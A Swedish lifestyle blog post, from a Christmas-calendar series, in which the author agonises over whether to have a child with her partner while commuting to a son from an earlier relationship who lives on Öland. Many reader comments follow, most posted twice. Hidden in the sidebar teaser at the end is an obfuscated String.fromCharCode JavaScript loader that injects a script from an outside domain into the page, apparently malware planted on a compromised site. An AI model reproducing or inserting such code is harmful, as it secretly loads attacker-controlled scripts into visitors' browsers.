Vågar jag skaffa barn igen?

Publiceras 8 december: Lucka nummer 8: ” Ett vägskäl jag är rädd för”

OLYMPUS DIGITAL CAMERA

Hej igen!

Då var det dags för lucka nummer 8. ”Ett vägsjäl jag är rädd för”❤️

Jag känner med hela min livssituation att jag alltid behöver välja bort någonting och slits emellan. Men försöker ändå att göra der bästa i alla lägen 👊🏻

Men just det här jag funderar på är ett vägsjäl jag står inför. Detta är en grej jag funderat mycket över. Speciellet sista halvåret.

Jonas är ju 42 år. Han har inga egna barn. Han och Ludvigs relation är fantastisk. Ludvig tycker verkligen om Jonas, och tvärt om🙏🏻

Det är ingen självklarheter att man  på ett naturligt sätt tar till sig sina bonusbarn/föräladrar. Men i ditt fallet gick det hur bra som helst.

Vi har efter många om och men, lyckats pussla ihop ett upplägg som fungerar för oss, med pendling och vardag för oss alla ☺️

Vi pendlar ju som du redan vet mellan Öland-Stockholm.  Ludvig har innan pendlat och haft en förskola på varje ställe. Fungerade också jätte bra tack vara alla inblandade….  Både dagmamman och förskolepersonalen såg till att ditt blev möjligt.

Tillsammans hjälptes vi alla åt att göra det bästa möjliga och det blev några år som han pendlade på detta sätt.

– TACK Magdalena i Färjestaden och personalen på Kids 2 Home i Sigtuna 🙏🏻❤️

 Sen träffade jag Jonas. Vi höll låg profil innan vi gick ut med det. Ville landa i ”oss” och se vart vi hamnade…

Ludvig började förskoleklass (gamla motsvarigheten till 6-års) och då kan man inte ha två förskolor. Pga individuella läroplaner och kommande studier. Ludvig ville börja i samma klass som sin bror.

Sagt och gjort, jag flyttade ner till Öland och visste ärligt talat inte hur jag skulle få ihop det varken känslomässigt. Hur jag skulle hålla balansen och behålla både jobb och Jonas. Men det gick ❤️

4F0F1A6A-A025-49FD-BABC-BD2E3AA52BA6

 Den tanken jag kommer tillbaka till ibland gäller samma sak. Ludvig går ju alltså i skolan där nere.

Vi hjälps åt, och kommunicerar mellan Ludvigs pappas familj och mig och Jonas. Ludvig har fyra syskon på sin pappas sida. Vi har änsålänge inga egna barn…

MEN. Jonas är 42 år utan egna barn. Jag är nu 31 år och känner mig säker på Jonas och min relation.

Den har inte varit helt enkel, pga av pendling, omständigheter osv… Men vi vet vart vi har varandra och vart vi båda vill och sakta men säkert börjat hitta VÅRAN balans❤️

Men, det som verkligen skrämmer mig är den dagen vi väljer att skaffa gemensamt barn.

-Vad händer då?

Ska jag behöva pendla mellan mina barn och få sakna våran nya bebis lika mycket som jag saknat Ludvig???! ( Jag går sönder av bara tanken💔) 

Är det någonting som jag verkligen lider av och mår fruktansvärt dåligt över så är det just separationsångesten över att vara ifrån Ludvig… (utan att lägga det på honom! )

 –Eller Ska jag ta med mig bebisen och låta Jonas sakna bebisen lika mycket?

Det är ju inte heller ett alternativ! 

Hur mycket kommer Ludvig att kunna träffa sitt nya syskon????

Han är ju världens bästa, omtänksamma store/Lillebror och kommer inte heller vilja välja eller vara ifrån sitt nyfödda syskon 😔

 -USCH!

Hur jag än vänder och vrider på detta så kör jag fast. Det känns som om jag tvingas välja mellan mina egna barn!?! 

Denna anledningen gör att jag blir rädd för hela tanken och inte vet om jag vågar skaffa barn igen…….

Ja, några tankar som jag klurar på. Som vanligt inget ”enkelt” beslut. Men mitt liv har aldrig varit ”enkelt” 😂🙈

Kram på er!

/My Martens 

OLYMPUS DIGITAL CAMERA

 

*Detta är en del i Kajsons julkalender – vill du också vara med så kan du läsa mer här.

85 Komentarer

 1. Oj! Förstår att du tycker det är ett svårt val. Man kan ju vrida och vända på det i all oändlighet. Ni kommer säkert att komma fram till en lösning så småningom. Ni är så fina ihop! Kram

 2. Oj! Förstår att du tycker det är ett svårt val. Man kan ju vrida och vända på det i all oändlighet. Ni kommer säkert att komma fram till en lösning så småningom. Ni är så fina ihop! Kram

 3. Jag har nästan varit i samma sits som du My och tillslut valde vi och skaffa ett gemensamt barn och det beslutet var inte lätt , men det beslutet var så jäkla RÄTT du ska inte tveka om ni känner båda att ni är rätt för varandra och det verkar ju så . Stort lycka till / Kram ❤️

 4. Jag har nästan varit i samma sits som du My och tillslut valde vi och skaffa ett gemensamt barn och det beslutet var inte lätt , men det beslutet var så jäkla RÄTT du ska inte tveka om ni känner båda att ni är rätt för varandra och det verkar ju så . Stort lycka till / Kram ❤️

 5. Det är verkligen ett dilemma som bara du och Jonas kan komma fram till ett svar på. Ge det tid att mogna så att ni båda är nöjda med ert beslut, landa i det så ska du se att oavsett resultat kommer ni kunna hantera situationen. Lycka till!

 6. Det är verkligen ett dilemma som bara du och Jonas kan komma fram till ett svar på. Ge det tid att mogna så att ni båda är nöjda med ert beslut, landa i det så ska du se att oavsett resultat kommer ni kunna hantera situationen. Lycka till!

 7. De låter ju lite jobbigt. Men tycker ändå att ni ska ha ett barn. I slutändan tror jag ni kommer att ångra er Jonas kan åka med lite mer ner kanske. Ni kommer att ångra er Jonas är ju så fantastisk med Ludvig. De måste ju lösa sig på något sätt?❤??

 8. Men hur tänker ni? Ingen som tänkt här på hur logistiken skulle fungera?? Det är inte så enkelt att bara skaffa barn hur som helst!!
  Du My måste ju pendla till Öland fram och tillbaka tills ditt barn blir 18 år, lång väg dit. Hur skulle detta vara möjligt med ett barn till??? Varken någon av er har ju ett 9-5 jobb, det är fullständigt ogenomförbart att skaffa barn när ni har sådana oregelbundna jobb och tider. Var glad för det barn du har, man behöver inte ha biologiska barn för att älska dem.

  • ”Tänk om” min son tex börjar högstadiet eller senare gymnasie i Sthlm? Där han har minst lika mycket vänner som på Öland? Dessutom så är jag ju inte gravid idag, skulle jag bli det om ett år tex, plus nio månader, så skulle Ludvig vara 18 är när den nye eventuella bebisen får skolplikt… Bara en tanke =) Man behöver inte ha ett 9-17 jobb för att skaffa barn =) Jonas tex jobbar oftast 10-15 =) Förutom på helgerna, men då är jag ju ledig ?

  • Hoppsan! Det finns en väldig massa människor som jobbar oregelbundet – skift inom vården, frilansare osv – som har barn och klarar det utmärkt. Vad i att inte arbeta 9-17 är det som gör en till en sämre förälder??

 9. Håller med! Stressad o utmattad redan nu… blir ju inte lättare med en pusselbit till. Men om ni kunde tänka er att bo heltid nere på Öland/Kalmar istället så tycker jag absolut, kör!

 10. Svår situation, har vart i samma sits själv. Fördelen för mig var att mina barn valde tillslut att bo med mig. Deras pappa bodde 50 mil ifrån. Sen blev det några syskon gjorda ?
  Ska du bo kvar i sthlm och vill ha barn så tror jag tyvärr att du måste låta Lilleman bo kvar hos sin pappa om inte han tillåter att Ludvig flyttar till er om det nu är det han vill?
  Annars får du och Jonas tänja om och bosätta er närmare Ludvig. Det är inte hållbart annars tror jag.
  Hoppas ni finner en bra lösning, ❤

 11. De låter ju lite jobbigt. Men tycker ändå att ni ska ha ett barn. I slutändan tror jag ni kommer att ångra er Jonas kan åka med lite mer ner kanske. Ni kommer att ångra er Jonas är ju så fantastisk med Ludvig. De måste ju lösa sig på något sätt😊❤💙💖

 12. Men hur tänker ni? Ingen som tänkt här på hur logistiken skulle fungera?? Det är inte så enkelt att bara skaffa barn hur som helst!!

  Du My måste ju pendla till Öland fram och tillbaka tills ditt barn blir 18 år, lång väg dit. Hur skulle detta vara möjligt med ett barn till??? Varken någon av er har ju ett 9-5 jobb, det är fullständigt ogenomförbart att skaffa barn när ni har sådana oregelbundna jobb och tider. Var glad för det barn du har, man behöver inte ha biologiska barn för att älska dem.

  • ”Tänk om” min son tex börjar högstadiet eller senare gymnasie i Sthlm? Där han har minst lika mycket vänner som på Öland? Dessutom så är jag ju inte gravid idag, skulle jag bli det om ett år tex, plus nio månader, så skulle Ludvig vara 18 är när den nye eventuella bebisen får skolplikt… Bara en tanke =) Man behöver inte ha ett 9-17 jobb för att skaffa barn =) Jonas tex jobbar oftast 10-15 =) Förutom på helgerna, men då är jag ju ledig 😉

  • Hoppsan! Det finns en väldig massa människor som jobbar oregelbundet – skift inom vården, frilansare osv – som har barn och klarar det utmärkt. Vad i att inte arbeta 9-17 är det som gör en till en sämre förälder??

 13. Men usch vad jobbigt att ha såna tankar. Det känns ju hopplöst nu men jag tror nog att om ni verkligen vill ha barn och måste ha det snart så kommer ni nog fram till någon lösning. Jag hoppas det i alla fall. ?

 14. Håller med! Stressad o utmattad redan nu… blir ju inte lättare med en pusselbit till. Men om ni kunde tänka er att bo heltid nere på Öland/Kalmar istället så tycker jag absolut, kör!

 15. Svår situation, har vart i samma sits själv. Fördelen för mig var att mina barn valde tillslut att bo med mig. Deras pappa bodde 50 mil ifrån. Sen blev det några syskon gjorda 😁

  Ska du bo kvar i sthlm och vill ha barn så tror jag tyvärr att du måste låta Lilleman bo kvar hos sin pappa om inte han tillåter att Ludvig flyttar till er om det nu är det han vill?

  Annars får du och Jonas tänja om och bosätta er närmare Ludvig. Det är inte hållbart annars tror jag.
  Hoppas ni finner en bra lösning, ❤

 16. Hur tänker du med graviditet i förhållande till dina bukplastik ( som även jag gjort). Risken finns ju att man får göra om allt och det vill inte jag. Skulle vilja veta allt du vet om detta och hur du tänker om detta.

 17. Men usch vad jobbigt att ha såna tankar. Det känns ju hopplöst nu men jag tror nog att om ni verkligen vill ha barn och måste ha det snart så kommer ni nog fram till någon lösning. Jag hoppas det i alla fall. 🙂

 18. Hur tänker du med graviditet i förhållande till dina bukplastik ( som även jag gjort). Risken finns ju att man får göra om allt och det vill inte jag. Skulle vilja veta allt du vet om detta och hur du tänker om detta.

 19. Nu har du bara sett alla problem. Alla glädjeåren då, som kommer med ett barn. Skaffa barn, ni älskar ju varandra. Då du åker ner till Ludvig kan väl barnet vara hos dig eftersom Jonas ofta jobbar då. Är han ledig så kan han ju komma ner till dig på Öland. Även om Jonas missar några dagar med barnet i bland är det väl bättre än missa ett eget barn helt. Detta barnet blir lika kärt för Ludvig som barnen på hans pappas sida. Lycka till. Kram.

 20. Du / ni ska ta det beslutet själva. Om det är vad ni vill så kör på.
  Du kanske tycker det låter ”grymt” det jag nu kommer skriva men tänk tanken att det kanske inte är så många år till som gossen ens vill umgås med er så mycket. Ju äldre han blir ju mindre tid kommer han spendera med er vuxna. Han kommer utveckla sina egna intressen och kompisar kommer bli allt viktigare.
  Kanske ska du / ni överväga att han kommer till er istället på helger och lov. Så länge han vill själv.
  Jag tycker inte du ska känna att du får dåligt samvete att tänka på ett barn till.
  Barn växer faktiskt ifrån en snabbt och på många sätt.
  Självklart förstår jag om du vill vara där sonen är men du kommer att märka att han kommer spendera mer och mer tid med annat.
  Man har barnen för livet men man måste förstå de blir egna människor med egna intressen ganska tidigt. Ingen vill umgås med mamma hela tiden. Du ska få se.

 21. Nu har du bara sett alla problem. Alla glädjeåren då, som kommer med ett barn. Skaffa barn, ni älskar ju varandra. Då du åker ner till Ludvig kan väl barnet vara hos dig eftersom Jonas ofta jobbar då. Är han ledig så kan han ju komma ner till dig på Öland. Även om Jonas missar några dagar med barnet i bland är det väl bättre än missa ett eget barn helt. Detta barnet blir lika kärt för Ludvig som barnen på hans pappas sida. Lycka till. Kram.

 22. Du / ni ska ta det beslutet själva. Om det är vad ni vill så kör på.
  Du kanske tycker det låter ”grymt” det jag nu kommer skriva men tänk tanken att det kanske inte är så många år till som gossen ens vill umgås med er så mycket. Ju äldre han blir ju mindre tid kommer han spendera med er vuxna. Han kommer utveckla sina egna intressen och kompisar kommer bli allt viktigare.
  Kanske ska du / ni överväga att han kommer till er istället på helger och lov. Så länge han vill själv.
  Jag tycker inte du ska känna att du får dåligt samvete att tänka på ett barn till.
  Barn växer faktiskt ifrån en snabbt och på många sätt.
  Självklart förstår jag om du vill vara där sonen är men du kommer att märka att han kommer spendera mer och mer tid med annat.
  Man har barnen för livet men man måste förstå de blir egna människor med egna intressen ganska tidigt. Ingen vill umgås med mamma hela tiden. Du ska få se.

 23. Bo på Öland medans du är mammaledig så får Jonas va där så mkt som möjligt och pendla det som är nödvändigt. Kan väll inte spela ngn roll om han flyger från Öland eller Stockholm?:) När han ska på gig tänker jag. Så kanske han kan jobba lite hemifrån och pendla lite till Stockholm. Allt löser sig bara man vill även när d är svårt och krångligt! ❤️ Kram och lycka till. PS tänk va mysigt med bebis?

  • Hihi! Tack för att du tar dit tiden att kommentera och kommer med goda råd??❤️ Ka, tanken och dialogen har varit på tal ? men Jonas har en studio med musikproduktion 10 min från där vi bor. Där har dom även ett artistbokeri (heter säkert inte så ?) men ett företag där dom bonar gig/spelningar år andra artister så han är på kontoret 4-5 dagar veckan förutom egna gig på helgerna ? mem visst… hissa saker skulle han kanske kunna göra även från öland…. vi spånar vidare och för väl prova oss fram ☺️❤️

 24. Bo på Öland medans du är mammaledig så får Jonas va där så mkt som möjligt och pendla det som är nödvändigt. Kan väll inte spela ngn roll om han flyger från Öland eller Stockholm?:) När han ska på gig tänker jag. Så kanske han kan jobba lite hemifrån och pendla lite till Stockholm. Allt löser sig bara man vill även när d är svårt och krångligt! ❤️ Kram och lycka till. PS tänk va mysigt med bebis😍

  • Hihi! Tack för att du tar dit tiden att kommentera och kommer med goda råd🙏🏻❤️ Ka, tanken och dialogen har varit på tal 😄 men Jonas har en studio med musikproduktion 10 min från där vi bor. Där har dom även ett artistbokeri (heter säkert inte så 🙈) men ett företag där dom bonar gig/spelningar år andra artister så han är på kontoret 4-5 dagar veckan förutom egna gig på helgerna 😅 mem visst… hissa saker skulle han kanske kunna göra även från öland…. vi spånar vidare och för väl prova oss fram ☺️❤️

 25. Klart ni ska kunna skaffa barn om ni vill ❤️ Min man hade inga jag fem och tvekade länge för pusselbitarna skulle passa. Till sist satsade jag på oss alla och Alicia är idag nio år. Jag ångrar att jag inte vågade tidigare då hon föddes när jag var 43 år! Men har ändå varit och är underbart.
  Som du skrev själv, när ett eventuellt barn ska börja skolan är Ludwig stor nog att själv välja vart han ska bo och hur som helst kommer kompisar och aktiviteter ta upp mycket av hans tid så väljer han att bo med pappa så kommer ni kanske till och med få mer kvalitets tid när ni väl ses!
  Och så tror jag inte det kommer kännas jobbigt att ibland lämna babyn med Jonas, detta kommer ju bli planerat ingen ofrivillig separation från barnet som med Ludwig.
  Lycka till och kör på ? vänta inte för länge?
  Kram

  • Tack ?? Både för att du tar dig tiden att dela med dig av din egna erfarenhet, och för att du är positiv till eventuell tillökning ??❤️ STOR KRAM

 26. ”Sätta ett barn till världen i en sådan situation” hmm. En situation fylld med kärlek, omtanke och uppoffringar från alla inblandade. Kärlek från föräldrar, bonusföräldrar, halvsyskon och närstående…. ❤️ Ja, kanske blev det just ännu mer klarhet för min del…

 27. ”Sätta ett barn till världen i en sådan situation” hmm. En situation fylld med kärlek, omtanke och uppoffringar från alla inblandade. Kärlek från föräldrar, bonusföräldrar, halvsyskon och närstående…. ❤️ Ja, kanske blev det just ännu mer klarhet för min del…

 28. Klart ni ska kunna skaffa barn om ni vill ❤️ Min man hade inga jag fem och tvekade länge för pusselbitarna skulle passa. Till sist satsade jag på oss alla och Alicia är idag nio år. Jag ångrar att jag inte vågade tidigare då hon föddes när jag var 43 år! Men har ändå varit och är underbart.
  Som du skrev själv, när ett eventuellt barn ska börja skolan är Ludwig stor nog att själv välja vart han ska bo och hur som helst kommer kompisar och aktiviteter ta upp mycket av hans tid så väljer han att bo med pappa så kommer ni kanske till och med få mer kvalitets tid när ni väl ses!
  Och så tror jag inte det kommer kännas jobbigt att ibland lämna babyn med Jonas, detta kommer ju bli planerat ingen ofrivillig separation från barnet som med Ludwig.

  Lycka till och kör på 😄 vänta inte för länge💕

  Kram

  • Tack 🙏🏻 Både för att du tar dig tiden att dela med dig av din egna erfarenhet, och för att du är positiv till eventuell tillökning 🙏🏻❤️ STOR KRAM

 29. Kör bara kör! Inget att tveka på säger jag. Det praktiska löser sig på något sätt. Man ångrar ju aldrig ett barn! Tror däremot man kan ångra att man inte skaffade barn.
  Klart ni ska ha barn! Kram fina du!

 30. ”Sätta ett barn till världen i en sådan situation” hmm. En situation fylld med kärlek, omtanke och uppoffringar från alla inblandade. Kärlek från föräldrar, bonusföräldrar, halvsyskon och närstående…. ❤️ Ja, kanske blev det just ännu mer klarhet för min del…

 31. Kör bara kör! Inget att tveka på säger jag. Det praktiska löser sig på något sätt. Man ångrar ju aldrig ett barn! Tror däremot man kan ångra att man inte skaffade barn.
  Klart ni ska ha barn! Kram fina du!

 32. Vet du vad My det du och Jonas har är väldigt unikt och självklart ska ni skaffa ett gemensamt barn så han får uppleva att få bli pappa. Det bästa som finns är ju att få bli förälder och när man ser Jonas och Ludvig så ser man ju att han skulle bli en underbar och fin pappa.
  Det praktiska löser sig alltid och du verkar ju vara en sån tjej som fixar det mesta. Titta bara hur bra du löste det till slut med Ludvig.
  Lycka till ?

 33. Vet du vad My det du och Jonas har är väldigt unikt och självklart ska ni skaffa ett gemensamt barn så han får uppleva att få bli pappa. Det bästa som finns är ju att få bli förälder och när man ser Jonas och Ludvig så ser man ju att han skulle bli en underbar och fin pappa.
  Det praktiska löser sig alltid och du verkar ju vara en sån tjej som fixar det mesta. Titta bara hur bra du löste det till slut med Ludvig.
  Lycka till 💕

 34. Nu är ju livet tyvärr så att det inte bara är att skaffa barn. Vill man ha ett barn så kanske man har lyckan att få ett barn.
  Själv har jag barn, men på alla de ofrivilligt barnlösas vägar avskyr jag orden skaffa barn.
  Om man önskar ett barn och får det, så brukar allt lösa sig. Vår sista var en överraskning och jag visste inte hur jag skulle klara det pga hälsoproblem. Men vi valde att barnet skulle få komma. Åren går och han är älskad, älskad, älskad!!

  • Åh! Vad glad jag blir för eran skull??❤️ Tack för att du delarna med dig ? det är så sant… långt ifrån självklart för all tyvärr… man vet aldrig men man kan alltid försöka ☺️

 35. Nu är ju livet tyvärr så att det inte bara är att skaffa barn. Vill man ha ett barn så kanske man har lyckan att få ett barn.
  Själv har jag barn, men på alla de ofrivilligt barnlösas vägar avskyr jag orden skaffa barn.

  Om man önskar ett barn och får det, så brukar allt lösa sig. Vår sista var en överraskning och jag visste inte hur jag skulle klara det pga hälsoproblem. Men vi valde att barnet skulle få komma. Åren går och han är älskad, älskad, älskad!!

  • Åh! Vad glad jag blir för eran skull🙏🏻❤️ Tack för att du delarna med dig 😌 det är så sant… långt ifrån självklart för all tyvärr… man vet aldrig men man kan alltid försöka ☺️

 36. Hej vännen min klart att du och Jonas fixar det herregud så många som är i samma sits vet du allt löser sig ska du se när den dagen kommer kram ?????

 37. Hej vännen min klart att du och Jonas fixar det herregud så många som är i samma sits vet du allt löser sig ska du se när den dagen kommer kram 💖💖💖🐾🐾

 38. Följ era hjärtan & låt det ”bli som det blir”. Jag tänker att blir det så är det meningen & då kommer det gå hur bra som helst. Ni är såpass medvetna att ni kommer lösa det på bästa sätt. Det kanske inte följer Svensson mallen men hur många gör det idag?
  I min familj gör vi det & min dotter på 20 år idag har hela tonårsperioden känt sig annorlunda för hon är den enda som har en ”vanlig” familj ??

 39. Följ era hjärtan & låt det ”bli som det blir”. Jag tänker att blir det så är det meningen & då kommer det gå hur bra som helst. Ni är såpass medvetna att ni kommer lösa det på bästa sätt. Det kanske inte följer Svensson mallen men hur många gör det idag?
  I min familj gör vi det & min dotter på 20 år idag har hela tonårsperioden känt sig annorlunda för hon är den enda som har en ”vanlig” familj 😂😂

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/